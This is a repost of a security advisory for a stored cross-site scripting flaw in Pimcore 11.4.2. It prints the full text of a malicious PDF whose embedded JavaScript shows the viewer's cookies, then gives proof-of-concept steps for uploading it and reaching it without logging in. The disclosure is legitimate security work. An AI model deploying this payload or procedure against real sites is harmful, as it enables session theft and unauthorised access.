BOOK THIS SPACE FOR AD
ARTICLE ADDescription:
A vulnerability classified as problematic was found in Pimcore 11.4.2. Affected by this vulnerability is an unknown functionality of the component Search Document. The manipulation leads to basic cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
Affected Component:
https://[ip]/Sample%20Content/Documents/xssmaeitsec.pdf
Payload:
%PDF-1.3%
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(function(){
try{
app.alert(document.cookie);
} catch(e){
app.alert(e.message);
}
})();
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream
BT
/F1 24 Tf
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
<</Root 1 0 R /Size 5>>
startxref
493
%%EOF
Proof of Concept:
Log in as Administrator2. Hover to Assets
3. Right click and click “Add Asset(s) > upload files
4. Upload malicious pdf
5. Click on search and select document
5. copy the path and open to a new tab E.g https://[ip]/Sample%20Content/Documents/xssmaeitsec.pdf
6. XSS PDF can be access without authentication.
7. Image showing no cookies indicator that there are no session currently in
maeitsec
https://www.linkedin.com/in/mheljun-enanoria-557809111/